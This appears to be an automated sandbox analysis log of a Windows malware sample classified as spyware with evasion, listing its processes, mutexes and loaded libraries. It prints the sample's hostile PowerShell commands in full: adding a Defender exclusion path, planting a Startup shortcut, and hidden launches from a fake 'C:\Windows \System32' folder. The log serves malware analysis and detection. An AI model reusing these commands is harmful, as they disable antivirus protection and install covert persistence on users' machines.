Source: YoS6ZBCcUy.exe, 00000000.00000003.1961131142.0000000005316000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBGInfo.exe. vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2092730468.0000000004754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename* vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147033936.0000000004B82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameElevate.exeH vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.2143596568.000000000475E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs YoS6ZBCcUy.exe
Source: YoS6ZBCcUy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal100.spre.spyw.evad.winEXE@65/132@0/1
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F97B90 GetModuleHandleW,FormatMessageW,GetLastError,LocalFree,_CxxThrowException,_CxxThrowException,19_2_00007FF780F97B90
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040338F
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00404722 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404722
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FDC700 GetModuleHandleW,FindResourceW,SizeofResource,LoadResource,LockResource,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,EnterCriticalSection,LeaveCriticalSection,vswprintf_s,_CxxThrowException,_CxxThrowException,FindResourceW,LoadResource,LockResource,SizeofResource,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,memcpy,_CxxThrowException,19_2_00007FF780FDC700
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeMutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeMutant created: \Sessions\1\BaseNamedObjects\31e24c48-f042-5745-a165-04e896e763b7
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeMutant created: \Sessions\1\BaseNamedObjects\JESUSAPT-7R4T5W
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nscC29A.tmp
Source: YoS6ZBCcUy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSIS.EXE'
Source: C:\Windows \System32\winSAT.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSIS.EXE'
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: winSAT.exeString found in binary or memory: ?Error: Use -? or -help for information on running this program
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile read: C:\Users\user\Desktop\YoS6ZBCcUy.exe
Source: unknownProcess created: C:\Users\user\Desktop\YoS6ZBCcUy.exe "C:\Users\user\Desktop\YoS6ZBCcUy.exe"
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "NSIS.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "NSIS.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: version.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: winmm.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: dxgi.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10_1.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10_1core.dll
